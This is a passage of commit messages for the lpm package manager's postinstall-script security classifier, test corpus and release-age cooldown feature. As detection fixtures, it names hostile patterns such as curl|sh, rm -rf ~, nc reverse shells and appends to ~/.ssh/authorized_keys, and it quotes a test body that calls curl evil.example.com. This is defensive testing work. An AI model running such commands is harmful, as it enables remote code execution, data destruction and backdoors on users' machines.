Clippy's let_and_return fires on `manager_with` under
`cargo clippy --all-targets` (not on the CI gate, which runs
`--workspace` only, so this has been silently red for anyone who flips
on --all-targets locally). One-line fix: return the struct literal
directly.
Surfaced while running the pre-merge CI gate for phase-46 P2 chunk 1
at --all-targets. Unblocks the lpm-auth clippy run; the remaining
--all-targets errors live in lpm-cli test code (build_state.rs
bool-literal assert_eq, trust.rs / trust_snapshot.rs needless struct
update) and are out of scope here.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…harness
Ships the starter fixture corpus (91 scripts across 14 categories)
plus a one-test integration harness that classifies every entry
against its declared expectation.
Layout:
crates/lpm-security/tests/fixtures/postinstall-scripts/
├── README.md — naming / ship-criteria doc
├── expectations.json — [{id, expected, notes?}]
└── scripts/<id>.txt — one raw body per entry
Corpus composition (deliberately biased toward amber/red coverage;
Chunk 6 grows toward 500 real-world postinstalls):
green-* (20): allowlist hits (tsc, node-gyp rebuild,
    prisma generate, husky [install], electron-rebuild,
    node <relative>.{js,cjs,mjs})
amber-d18-* (10): D18 network binary downloaders (playwright,
    puppeteer, cypress, electron-builder, node install.js)
amber-compound-* (8): compounds of otherwise-green commands
amber-novel-* (12): out-of-allowlist commands (python, make, cmake,
    gulp, npx, yarn build…)
amber-node-escape-* (5): node with escaping paths (../, /abs, ~/,
    $HOME, no-ext)
amber-parse-fail-* (1): unbalanced quote → shlex fails closed
red-pipe-* (5): curl|sh / wget|bash / base64 -d|sh
red-eval-* (3): eval, node -e, node --eval
red-nested-pm-* (8): npm/pnpm/yarn/bun/pip/cargo/gem/brew install
red-rm-* (4): rm -rf ~ / / $HOME / ~/.ssh
red-chmod-* (2): chmod outside package tree
red-redirect-* (3): >> ~/.bashrc / ~/.ssh/authorized_keys
    (including no-space regression)
red-nc-* (2): nc / ncat reverse shell
adversarial-* (8): §12.2 stress set: U+202E RTL override,
    U+200D ZWJ, U+FEFF BOM, Invoke-Expression, iex,
    FromBase64String, Add-MpPreference, no-space pipe-bash
Harness (tests/static_gate_corpus.rs, one test, ~40ms):
- Loads manifest + each raw-body file, calls classify(), asserts
declared expectation matches actual tier for every entry.
- Hard-fails on any false-positive red (§4.1 ship criterion).
- Hard-fails if the classifier ever emits AmberLlm (contract
invariant: P2 owns Green|Amber|Red; AmberLlm is reserved for P8).
- Duplicate-id guard on manifest load.
- Prints per-run stats (total / green / amber / red + green-rate on
the real-corpus subset) so tuning during Chunks 3–6 has continuous
feedback. The ≥60% green-rate threshold is NOT asserted here —
starter corpus is biased low by design (current: 35%); threshold
flips to hard-gate in Chunk 6 once the corpus grows to 500.
Denominator for the ≥60% is pinned in the plan doc (§4.1 update in
a separate commit): green / (green + amber) over non-adversarial
entries, measured the same way the harness measures it today.
Unicode bytes verified on disk (xxd):
adversarial-001: E2 80 AE (U+202E RTL OVERRIDE)
adversarial-002: E2 80 8D (U+200D ZWJ)
adversarial-003: EF BB BF (U+FEFF BOM)
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-security ✓ (388/388)
- cargo nextest run --workspace --exclude lpm-integration-tests ✓
(3834/3836; 2 failures are the known lpm-task perf_eval_* flake under
parallel load, pass serially, not in touched crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…-builds UI/JSON
Static-gate classification now runs at install-time blocked-set
capture and is persisted on every fresh BlockedPackage. Value
surfaces in both the human approve-builds card and the --json shape
so the existing review flow gains the P2 tier annotation
immediately.
lpm-security/triage.rs
- Adds StaticTier::worse_of — canonical worst-wins reducer
(Red > AmberLlm > Amber > Green). Symmetric, idempotent, fits
Iterator::reduce directly. 7 precedence tests.
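A small sketch of a worst-wins reducer with the precedence stated above (Red > AmberLlm > Amber > Green). The private `severity` ranking and the `fold_tiers` wrapper are illustrative assumptions; only `StaticTier::worse_of` and its ordering come from the commit message.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

impl StaticTier {
    /// Assumed internal ranking; higher means worse.
    fn severity(self) -> u8 {
        match self {
            StaticTier::Green => 0,
            StaticTier::Amber => 1,
            StaticTier::AmberLlm => 2,
            StaticTier::Red => 3,
        }
    }

    /// Returns whichever of the two tiers is worse.
    pub fn worse_of(self, other: Self) -> Self {
        if other.severity() > self.severity() {
            other
        } else {
            self
        }
    }
}

/// Folds per-phase tiers into one package-level tier; None when empty.
pub fn fold_tiers(tiers: &[StaticTier]) -> Option<StaticTier> {
    tiers.iter().copied().reduce(StaticTier::worse_of)
}
```

Because `worse_of` takes and returns `Self`, it can be passed to `Iterator::reduce` without a closure.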
lpm-cli/build_state.rs
- Replaces read_present_install_phases with
read_install_phase_bodies — returns Vec<(phase_name, body)> in
canonical EXECUTED_INSTALL_PHASES order. One read + parse of
package.json feeds both phases_present derivation and the
classifier; old helper had one caller and is deleted.
- compute_blocked_packages_with_metadata classifies each present
phase body via lpm_security::static_gate::classify, folds
worst-wins via StaticTier::worse_of, and writes the result to
BlockedPackage.static_tier. Populated unconditionally per plan
§5.1 (annotation works under deny/triage/allow). A freshly
computed BlockedPackage always has Some(tier); None indicates
persisted state predates P2.
- 8 new tests: read_install_phase_bodies order + empty-body skip +
error paths; worst-wins population for Green, Red, Green+Red→Red,
Green+Amber→Amber; always-Some invariant.
lpm-cli/commands/approve_builds.rs
- SCHEMA_VERSION: 1 → 2 (per plan §6.4). Version-history doc
captures the v2 delta.
- blocked_to_json emits "static_tier": kebab-case string or null.
null (not omitted) for v1 legacy state so agents can distinguish
"no tier known" from "field missing" without re-checking
schema_version per row.
- print_package_card renders `Static tier: <label>` with color
(green→green, amber/amber-llm→yellow, red→red). Absent means the
blocked state predates P2; no line is printed rather than
showing "unknown".
- tier_label_text + colored_tier_label split — pure helper is
unit-testable, color wrapper is separate. 8 new tests: schema
bump, every tier→JSON mapping, null-when-absent, label
distinctness, label prefix, colored-embeds-plain.
lpm-cli/tests/approve_builds_audit_regression.rs
- Two stdout-JSON contract tests pinned schema_version == 1;
bumped to 2 with inline comment pointing at this change.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-cli ✓ (1436/1436)
- cargo nextest run --workspace --exclude lpm-integration-tests ✓
(3856/3860; the 4 failures are the known lpm-task perf_eval_* flake
under parallel load; all 4 pass serially in 0.28s, not in touched
crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Completes the `script-policy=triage` UX contract from plan §11 P2:
bulk approval is restricted to the green tier. Non-green entries
must go through the interactive walk or single-package approval so
each gets explicit human review.
Refusal contract (contract with agents: "--yes refuses" prefix is
stable P2-onward for substring-matching on the error payload):
- Some(Green) → pass (still requires explicit --yes; auto-execution
is P6, gated on the P5 sandbox per D20).
- None → pass. Pre-P2 persisted state carries None; breaking
existing --yes muscle memory during a P1→P2 upgrade before the
next fresh install recaptures tiers would be a silent
regression. The next install populates tiers and from then on
the gate applies.
- Some(Amber | AmberLlm | Red) → refuse, list each refused
{name}@{version} + tier label, redirect to `lpm approve-builds`
interactive / `lpm approve-builds <pkg>` / `lpm approve-builds
--list`.
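The refusal contract above can be sketched as a pure function. This is an illustration under assumptions: `BlockedPackage` is reduced to three fields, the error type is a plain `String` rather than `LpmError`, and everything after the stable "--yes refuses" prefix is invented wording.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

/// Simplified stand-in for the persisted blocked-package record.
pub struct BlockedPackage {
    pub name: String,
    pub version: String,
    pub static_tier: Option<StaticTier>,
}

fn tier_label(tier: StaticTier) -> &'static str {
    match tier {
        StaticTier::Green => "green",
        StaticTier::Amber => "amber",
        StaticTier::AmberLlm => "amber-llm",
        StaticTier::Red => "red",
    }
}

/// Passes for Green and for None (pre-P2 state); refuses anything else.
/// Performs no I/O, so a refusal cannot leave side effects behind.
pub fn enforce_tiered_yes_gate(blocked: &[BlockedPackage]) -> Result<(), String> {
    let refused: Vec<String> = blocked
        .iter()
        .filter_map(|p| match p.static_tier {
            None | Some(StaticTier::Green) => None,
            Some(tier) => Some(format!("{}@{} ({})", p.name, p.version, tier_label(tier))),
        })
        .collect();

    if refused.is_empty() {
        return Ok(());
    }
    // Only the "--yes refuses" prefix is described as stable in the source;
    // the rest of this message is assumed wording.
    Err(format!(
        "--yes refuses {} non-green package(s): {}. Review them via `lpm approve-builds` (interactive), `lpm approve-builds <pkg>`, or `lpm approve-builds --list`.",
        refused.len(),
        refused.join(", ")
    ))
}
```

Calling the gate before any banner or manifest write is what keeps a refusal free of success-shaped output.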
Gate placement: the enforce_tiered_yes_gate call sits BEFORE
emit_yes_warning_banner at approve_builds.rs:309. Emitting the
banner (human stdout + tracing::warn!) and then aborting would
corrupt log aggregators and the console with success-shaped output
for a no-op — the gate must refuse before any side effect. Manifest
write_back is similarly gated, so a refusal leaves package.json
byte-identical to its pre-call form (asserted by the e2e test).
Implementation:
- New pure helper `enforce_tiered_yes_gate(&[BlockedPackage])
-> Result<(), LpmError>` next to the existing tier-label helpers.
- Existing approve_builds e2e fixtures that used
`"postinstall": "node install.js"` were AMBER under Chunk 3 (D18
binary-fetcher convention) and would make --yes refuse. Switched
the 5 initial-install bodies to `"tsc"` (green) — the tests'
intent is state-machine transitions, not the specific body. The
drift-injection body at line 2341 (`"node install.js && curl
evil.example.com"`) stays because it's set AFTER approval and
never hits the gate.
Tests (12 new):
- 9 pure enforce_tiered_yes_gate tests: empty / all-green / all-None /
mixed green+None / single amber / single amber-llm / single red /
mixed (count accuracy + listing only refusals) /
error-message redirects to interactive path.
- 3 e2e tests via run(): amber refuses + manifest byte-unchanged,
all-green approves, None-tiered legacy state passes through.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-cli ✓ (1448/1448)
- cargo nextest run --workspace --exclude lpm-integration-tests ✓
(3870/3872; the 2 failures are the known lpm-task perf_eval_* flake
under parallel load; 4/4 pass serially in 0.4s, not in touched crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Under `script-policy = "triage"`, `lpm install` emits a single-line
per-tier summary in place of the existing multi-line build hint.
`deny` and `allow` paths are unchanged. Line shape is stable
P2-onward (snapshot-tested):
script-policy: triage (N green / M amber / K red → lpm approve-builds)
Agents parsing the line have two stable anchors:
- prefix: `"script-policy: triage ("`
- suffix: `" → lpm approve-builds)"`
Helpers (build_state.rs):
- count_blocked_by_tier — returns (green, amber, red). AmberLlm and
None collapse into amber (conservative: unknown → needs review).
- format_triage_summary_line — deterministic formatter over the
count. Both shared with future --json install output so human and
machine shapes agree on the arithmetic.
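A sketch of the two helpers, assuming they operate on a slice of optional tiers rather than full `BlockedPackage` records and that the formatter takes the count tuple directly. The line shape and the collapse rule (AmberLlm and None count as amber) are taken from the text above; the signatures are illustrative.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum StaticTier {
    Green,
    Amber,
    AmberLlm,
    Red,
}

/// Returns (green, amber, red). AmberLlm and None are counted as amber,
/// the conservative reading of "unknown needs review".
pub fn count_blocked_by_tier(tiers: &[Option<StaticTier>]) -> (usize, usize, usize) {
    let mut counts = (0, 0, 0);
    for tier in tiers {
        match tier {
            Some(StaticTier::Green) => counts.0 += 1,
            Some(StaticTier::Red) => counts.2 += 1,
            Some(StaticTier::Amber) | Some(StaticTier::AmberLlm) | None => counts.1 += 1,
        }
    }
    counts
}

/// Deterministic formatter over the counts, using the line shape quoted
/// in the commit message.
pub fn format_triage_summary_line(counts: (usize, usize, usize)) -> String {
    format!(
        "script-policy: triage ({} green / {} amber / {} red → lpm approve-builds)",
        counts.0, counts.1, counts.2
    )
}
```

An agent can locate the line by its prefix and suffix anchors and read the three counts from between them.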
Install-path wiring:
- run_with_options gains `script_policy_override: Option<ScriptPolicy>`
and at the show_install_build_hint site loads the project's
ScriptPolicyConfig, resolves against the override, and branches:
if effective == Triage → emit format_triage_summary_line; else →
legacy show_install_build_hint + output::info redirect.
- run_link_and_finish (the lockfile fast path) mirrors the same
branch at its own hint site. Both install code paths stay in
sync.
- run_add_packages and run_install_filtered_add forward the
override through to run_with_options.
- main.rs: preserves the collapsed CLI override separately so all
four install-dispatch sites forward it. Per-target resolution
re-evaluates against the target's package.json (matters for
workspace-filtered installs where the member may set its own
scriptPolicy).
Internal install callers (9 files: add, deploy, dev, doctor,
install_global, migrate, run, update_global, upgrade) pass `None`
— these don't expose --policy/--yolo/--triage flags and inherit
the project-config precedence.
Tests (7 new, all in build_state::tests):
- count_blocked_by_tier_empty_returns_zeros
- count_blocked_by_tier_counts_green_amber_red_distinctly
- count_blocked_by_tier_amber_llm_counts_as_amber
- count_blocked_by_tier_none_counts_as_amber_conservative
- format_triage_summary_line_shape_is_stable (snapshot)
- format_triage_summary_line_all_zero_when_empty
- format_triage_summary_line_anchor_and_suffix_present
Queued for a later chunk (noted from reviewer): a stdout-capture
e2e test for the triage branch on the lockfile fast path. Not a
sign-off blocker — branch selection is thin glue over well-tested
helpers.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-cli ✓ (1455/1455)
- cargo nextest run --workspace --exclude lpm-integration-tests ✓
(3878/3879; the 1 failure is the known lpm-task perf_eval_glob
parallel-load flake, all 4 perf_eval tests pass serially in 0.38s;
not in touched crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… hard-gate ≥60% green-rate
Closes the P2 ship contract from plan §18:
- Top-500 postinstall fixture corpus locked (500 entries, hard-asserted).
- ≥60% green classification rate (73% measured, hard-asserted).
- Zero false-positive reds (asserted).
- Adversarial corpus locked and passing (20 entries, all red-expected).
- Execution semantics still unchanged (annotation-only per D20).
Corpus growth (91 → 500):
- +409 fixture files across 14 categories. Distribution reflects
real-world top-500 postinstall shape: greens dominate (node-gyp
rebuild, tsc, husky install, prisma generate account for most
package postinstalls), ambers cover D18 network binary downloaders
+ common build-tool patterns, reds cover attack classes with
variety for regression coverage.
- Final breakdown: 310 green / 114 amber / 76 red / 20 adversarial.
- Green-rate over non-adversarial subset: 73% (well above the 60%
ship-criterion floor).
Harness enforcement (closes a late-Chunk-6 audit):
- New constant CORPUS_MIN_ENTRIES = 500. A drop to 499 now hard-fails
with a message pointing at plan §18 and telling future maintainers
to update doc + const in lockstep if the floor is lowered
deliberately. Previously the harness only asserted "not empty",
which left "500 locked" documentary-only.
- New assert_manifest_matches_filesystem: enumerates scripts/*.txt
and does a BTreeSet bijection check against manifest ids. Orphans
in either direction hard-fail with a labelled listing (missing-
script vs missing-manifest-entry). Previously the harness only
loaded manifest entries, so orphan files or stale manifest rows
drifted silently.
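The bijection check can be sketched as follows. To stay self-contained, this version takes the manifest ids and script file names as slices instead of reading `expectations.json` and the `scripts/` directory, and it returns an error string where the real harness hard-fails. The function name and ids are hypothetical.

```rust
use std::collections::BTreeSet;

/// Checks that manifest ids and `<id>.txt` script files are in one-to-one
/// correspondence. Orphans in either direction produce a labelled listing.
pub fn check_manifest_matches_filesystem(
    manifest_ids: &[&str],
    script_files: &[&str],
) -> Result<(), String> {
    let manifest: BTreeSet<&str> = manifest_ids.iter().copied().collect();
    // Files without a .txt suffix are ignored in this sketch.
    let on_disk: BTreeSet<&str> = script_files
        .iter()
        .copied()
        .filter_map(|f| f.strip_suffix(".txt"))
        .collect();

    // In the manifest, but no script file on disk.
    let missing_script: Vec<&str> = manifest.difference(&on_disk).copied().collect();
    // On disk, but no manifest row.
    let missing_entry: Vec<&str> = on_disk.difference(&manifest).copied().collect();

    if missing_script.is_empty() && missing_entry.is_empty() {
        Ok(())
    } else {
        Err(format!(
            "missing-script: {:?}; missing-manifest-entry: {:?}",
            missing_script, missing_entry
        ))
    }
}
```

`BTreeSet` keeps both orphan listings sorted, so the failure message is stable across runs.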
expectations.json regenerated from the filesystem and is now
mechanically regenerable via the README's Python one-liner. Notes
fields dropped — category lives in the id prefix, and stripping
notes makes the manifest trivially derivable from disk which is what
the bijection check exploits.
README updated: "starter set" → "500-script fixture set"; ship
criteria restated as hard-asserted; regeneration instructions embed
the manifest-from-filesystem command. Plan-doc contract ("top-500
corpus locked") now matches on-disk reality.
Tuning discipline followed per reviewer guidance: corpus growth came
first, miss shapes measured (zero — the classifier rules hold
across the broader corpus), no red rule was weakened, no green rule
was widened. Reached 73% green-rate naturally.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-security ✓ (395/395)
- cargo nextest run --workspace --exclude lpm-integration-tests ✓
(3878/3879; the 1 failure is the known lpm-task perf_eval_glob
parallel-load flake, passes serially; not in touched crates)
P2 is complete. Next work moves to P3 (cooldown surface) per the
plan's phase ordering.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…oercion
Lands the plumbing for the Phase 46 P3 cooldown surface (§8, §11 P3)
without yet wiring it into install.rs — that's Chunk 2 alongside the
`--min-release-age=<dur>` clap flag.
Core pieces:
* `lpm-cli/src/release_age_config.rs` — new module.
* `parse_duration(&str) -> Result<u64, LpmError>` accepts `72h` / `3d` /
plain seconds; rejects empty, whitespace, unsupported units, negative
values, fractionals, `+` prefix (u64::from_str quietly takes it), and
multiplication overflow on h/d.
* `ReleaseAgeResolver::resolve(project_dir, cli_override)` walks the
§11 P3 precedence chain highest first: CLI → `package.json > lpm >
minimumReleaseAge` → `~/.lpm/config.toml` key
`minimum-release-age-secs` → default 86400. `./lpm.toml` is
deliberately NOT in the chain (D14).
* `read_global_min_age_from_file` is path-aware + fallible, mirroring
Phase 33's save-config loader. Malformed TOML, non-table top level,
and garbage values surface file-pathed errors with the offending
key name — not silently ignored the way `GlobalConfig::load`
swallows them.
* `parse_strict_u64_string` — single `pub(crate)` helper for every
string-to-seconds coercion site. Rejects `+` / `-` prefixes before
`parse::<u64>`, because `u64::from_str("+5")` silently returns
`Ok(5)` and would otherwise let `lpm config set
minimum-release-age-secs +259200` slip through a contract the CLI
parser rejects.
* `lpm-security/src/lib.rs` — new `SecurityPolicy::with_resolved_min_age`
constructor. Reads `trustedDependencies` from package.json with the
same tolerance as `from_package_json` but takes the seconds value
from the caller. Keeps lpm-security free of CLI/config-file
knowledge; `from_package_json` itself is untouched.
* `lpm-cli/src/commands/config.rs` — `GlobalConfig::get_u64` convenience
reader, routing string coercion through `parse_strict_u64_string`
for uniform "no sign prefix" semantics across CLI flag, global
loader, and this accessor.
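A minimal sketch of the strict parsing contract described above. The error type is a plain `String` here (the real functions return `LpmError`), and the exact messages are assumptions; the accepted forms, the sign-prefix rejection, and the overflow check follow the commit text.

```rust
/// Strict string-to-u64 coercion: rejects sign prefixes before delegating
/// to the standard parser, which on its own accepts a leading '+'.
pub fn parse_strict_u64_string(s: &str) -> Result<u64, String> {
    if s.starts_with('+') || s.starts_with('-') {
        return Err(format!("sign prefix not allowed: {:?}", s));
    }
    // The standard parser already rejects empty input, whitespace,
    // fractionals, and other non-digit characters.
    s.parse::<u64>()
        .map_err(|e| format!("invalid number {:?}: {}", s, e))
}

/// Parses `<N>h`, `<N>d`, or plain seconds into a number of seconds.
pub fn parse_duration(input: &str) -> Result<u64, String> {
    let (digits, multiplier) = if let Some(n) = input.strip_suffix('h') {
        (n, 3_600)
    } else if let Some(n) = input.strip_suffix('d') {
        (n, 86_400)
    } else {
        (input, 1)
    };
    let n = parse_strict_u64_string(digits)?;
    // checked_mul surfaces overflow on the h/d multiplication as an error.
    n.checked_mul(multiplier)
        .ok_or_else(|| format!("duration overflows u64 seconds: {:?}", input))
}
```

An unsupported unit such as `5m` needs no special case: the suffix is not stripped, so the digits check rejects it.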
Test coverage (50 unit tests, all pass): parser edge cases incl.
`+`/`-`/whitespace/garbage/overflow; global-file reader missing /
empty / integer / string-coerced / negative / garbage / wrong-type /
malformed-TOML all with file-pathed errors; resolver precedence
covering every §11 P3 ship-criteria case; `parse_strict_u64_string`
unit tests; plus-prefix regression guards on both the global loader
and `GlobalConfig::get_u64` (reviewer finding).
The `#[allow(dead_code)]` attributes on the module and on `get_u64` are
explicit "Chunk 2 removes this" scaffolds: the items are exercised by
unit tests but not yet called from the binary target. They come off
atomically when the clap flag + install.rs wiring lands.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
— 3927 pass / 2 fail. Both failures are
`lpm-task filter::eval::tests::perf_eval_*`, the known parallel-
nextest flakes called out in the P3 prompt; pass deterministically
with `-j 1`.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…urface
Wires the Chunk 1 resolver into the install pipeline and exposes the
Phase 46 P3 CLI surface (§8, §11 P3). After this commit a user-visible
override chain exists end-to-end: `--min-release-age=<dur>` →
package.json → `~/.lpm/config.toml` → default 24h.
CLI surface:
* `lpm install --min-release-age=<DUR>` — accepts `<N>h`, `<N>d`, or
plain seconds. Parsed once at the clap layer via
`release_age_config::parse_duration`; invalid input errors before any
install work starts.
* `--allow-new` unchanged (blanket bypass, orthogonal to this flag).
* Blocked-packages hint reordered narrowest → broadest per the §11 P3
ship criteria: `--min-release-age=0` (per-install, numeric),
`--allow-new` (per-install, blanket), `package.json` (persistent).
* Error message surfaces both override paths.
Install pipeline:
* `run_with_options`, `run_add_packages`, `run_install_filtered_add`
grow `min_release_age_override: Option<u64>` at end of signature.
* Cooldown gate at install.rs:1646 replaced
`SecurityPolicy::from_package_json(...)` with
`ReleaseAgeResolver::resolve(project_dir, override)?` +
`SecurityPolicy::with_resolved_min_age(...)`. One user-visible
behaviour change lands with this: a malformed `~/.lpm/config.toml`
(or garbage `minimum-release-age-secs` value) now fails install with
a file-pathed error rather than being silently ignored — that's the
path-aware loader contract from the Chunk 1 review, now live.
Global-install rejection (reviewer finding):
* `validate_global_install_project_scoped_flags` extended to reject
`--min-release-age` on the `-g` path with an explicit Phase 46.1
pointer. Without this the clap flag was parsed AFTER the `-g` early
return, so even `--min-release-age=garbage` silently passed — a
contract bug where the shared `Install` clap surface advertised a
flag that global installs silently ignored.
* New regression test covers four payload shapes (`0`, `72h`,
`garbage`, `+5h`) — each asserts the error names the flag AND points
at Phase 46.1.
Fan-out to 9 non-Install install-pipeline callers (`add`, `deploy`,
`dev`, `doctor`, `migrate`, `run`, `upgrade`, `install_global`,
`update_global`): each passes `None` with a one-line comment
explaining why (`uses the chain` / D13/D19 global scope / `deploy
already bypasses via allow_new=true`).
Scaffolds: Chunk 1's `#![allow(dead_code)]` on the module and the
temporary "Chunk 2 removes this" note on `GlobalConfig::get_u64` come
off. `get_u64` keeps a single `#[allow(dead_code)]` with an honest
note — it's retained for the behavioural unit test and future callers;
no production caller exists because the resolver uses the path-aware
fallible helper instead.
Behavioural verification (manual,
`CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `lpm-rs install --help` — flag documented with full precedence chain.
* `lpm-rs install --min-release-age=garbage` → exit 1 with
duration-parse error.
* `lpm-rs install -g foo --min-release-age=garbage` → exit 1 at
CLI-exclusivity check (before parse_duration runs).
* `lpm-rs install -g foo --min-release-age=0` → exit 1, same rejection.
* `lpm-rs install -g foo` (no flag) → exit 0, proceeds normally.
CI gate (explicit):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
— 3928 pass / 2 fail. Both failures are the known
`lpm-task filter::eval::tests::perf_eval_*` parallel-nextest flakes
pre-flagged in the P3 prompt; pass deterministically with `-j 1`.
Chunk 3 lands integration coverage: the §11 P3 ship-criteria E2E tests
(`--min-release-age=72h` blocks; `--allow-new` unblocks; global TOML
overrides default; package.json overrides global) and the §12.3
pin-bypass regression.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ss guard
Adds end-to-end coverage for the Phase 46 P3 cooldown surface against
a wiremock-backed mock registry. Closes the integration gap the
reviewer called out at the end of Chunk 2.
New file: `crates/lpm-cli/tests/release_age_p3_ship_criteria.rs` —
300 LOC, 5 subprocess tests.
Harness pattern is lifted from
`crates/lpm-cli/tests/upgrade_phase7_regression.rs`: start a
`wiremock::MockServer`, mount single-package + batch-metadata
endpoints with a controllable `time[VERSION]` field, serve a real
tarball, then spawn `lpm-rs install` with `LPM_REGISTRY_URL` pointing
at the mock and `HOME` scoped to a per-test temp dir (so the tests
never read the developer's `~/.lpm/config.toml`).
Tests (§11 P3 ship criteria):
* `cli_override_72h_blocks_fresh_package` — package published 1h ago,
manifest disables the check (`minimumReleaseAge: 0`),
`--min-release-age=72h` re-enables at 72h. Blocks; output renders
`259200` to prove the CLI value took effect.
* `allow_new_bypasses_cli_override` — same fixture plus
`--allow-new`. Cooldown does not fire. Proves orthogonality (§8.3,
D16): the two flags are independent escape hatches.
* `global_config_overrides_default` — package 30 min old, global
`minimum-release-age-secs = 3600` (1h), no manifest key, no CLI
flag. Blocks, output renders `3600` but NOT `86400` — proving the
global layer is what took effect.
* `package_json_overrides_global` — package 30 min old, global = 3600
(would block), manifest = 60 (1 min, would allow). Cooldown does
not fire — manifest layer wins.
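The precedence these four tests exercise can be sketched as a pure function over the already-parsed layers. This is an illustration only: the real `ReleaseAgeResolver::resolve` reads the layers from disk and can fail, the function names here are hypothetical, and the strict `<` comparison at the window boundary is an assumption.

```rust
/// Default cooldown window: 24h, per the commit text.
pub const DEFAULT_MIN_RELEASE_AGE_SECS: u64 = 86_400;

/// Highest layer first: CLI flag, then package.json, then the global
/// config file, then the default.
pub fn resolve_min_release_age(
    cli: Option<u64>,
    package_json: Option<u64>,
    global: Option<u64>,
) -> u64 {
    cli.or(package_json)
        .or(global)
        .unwrap_or(DEFAULT_MIN_RELEASE_AGE_SECS)
}

/// A package is blocked while it is younger than the resolved window,
/// unless the blanket `--allow-new` bypass is set.
pub fn cooldown_blocks(age_secs: u64, min_age_secs: u64, allow_new: bool) -> bool {
    !allow_new && age_secs < min_age_secs
}
```

Note that an explicit `0` at a higher layer is a value, not an absence: a manifest `0` disables the check unless the CLI layer overrides it.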
§12.3 pin-bypass regression:
* `pin_does_not_bypass_cooldown` — explicit-version install
(`@lpm.dev/acme.widget@1.0.0`), package 1h old, default 24h
window. Blocks. The v1 plan proposed pin-bypass; v2 rejected it
per D7 because renovate / dependabot auto-pin PRs would otherwise
land compromised versions during the detection window (the axios
attack scenario in §1). This test is the structural guard that
the rejected behaviour never re-lands.
A shared `Fixture` struct encapsulates the mock-registry + tempdir +
scoped-HOME setup. Assertion helpers `assert_cooldown_blocked` and
`assert_cooldown_not_blocked` check both stdout and stderr (the
cooldown path uses `eprintln!` for warning lines and miette's
`LpmError::Registry` for the final error; both channels can carry
the signal depending on `--json` mode). Panic messages always dump
exit code + stdout + stderr so a failing assertion never leaves the
author guessing.
Behaviourally verified: all 5 tests pass in isolation
(`cargo nextest run -p lpm-cli --test release_age_p3_ship_criteria`).
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
— 3931 pass / 4 fail. All 4 failures are
`lpm-task filter::eval::tests::perf_eval_*`, the machine-load-sensitive
parallel-nextest flakes explicitly carved out in the P3 prompt
("never in touched crates"). Chunk 3 touches only lpm-cli; lpm-task
is untouched. Isolated lpm-cli runs (both new E2E tests and the
Chunk 1 unit tests) pass 55/55; lpm-security passes 395/395.
Phase 46 P3 is complete. Ship criteria 1–4 covered end-to-end,
§12.3 pin-bypass regression in place, global-config error surface
enforced by the path-aware loader committed in Chunk 1.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…location
Chunk 1 of the Phase 46 P4 provenance-drift work (§7, §11 P4). Pure
schema scaffolding — no install-pipeline behaviour change yet. The
fetch/cache and the drift comparator land in Chunks 2-3 per the
user-approved refined plan.
Type scaffolding:
* `lpm-registry`: `DistInfo` gains `signatures: Option<Vec<RegistrySignature>>`
and `attestations: Option<AttestationRef>` (§7.1). Non-breaking:
`serde(default)` + `skip_serializing_if = "Option::is_none"` keeps
legacy registry responses (LPM today) round-tripping cleanly. Also
now derives `Default` so `..Default::default()` works at the two
test construction sites (install_global.rs, global_phase37_e2e.rs).
* `lpm-registry`: new `RegistrySignature { keyid, sig }` models npm's
per-key package-signing surface.
* `lpm-registry`: new `AttestationRef { url, provenance }` models
npm's `dist.attestations` pointer. `provenance` kept as loose
`serde_json::Value` in Chunk 1; Chunk 2's fetcher types the subset
it consumes. This isolates schema evolution from the wire surface.
* `lpm-workspace`: `TrustedDependencyBinding` gains
`provenance_at_approval: Option<ProvenanceSnapshot>` (§6.2 field
ownership). JSON key is `provenanceAtApproval` matching the plan's
wire spec. Non-breaking via serde defaults.
Structural change — `ProvenanceSnapshot` relocated:
`lpm-security/src/triage.rs` → `lpm-workspace/src/lib.rs`
This was forced by the §6.2 wiring:
`TrustedDependencyBinding.provenance_at_approval` must reference the
type, but `lpm-security` already depends on `lpm-workspace`, so the
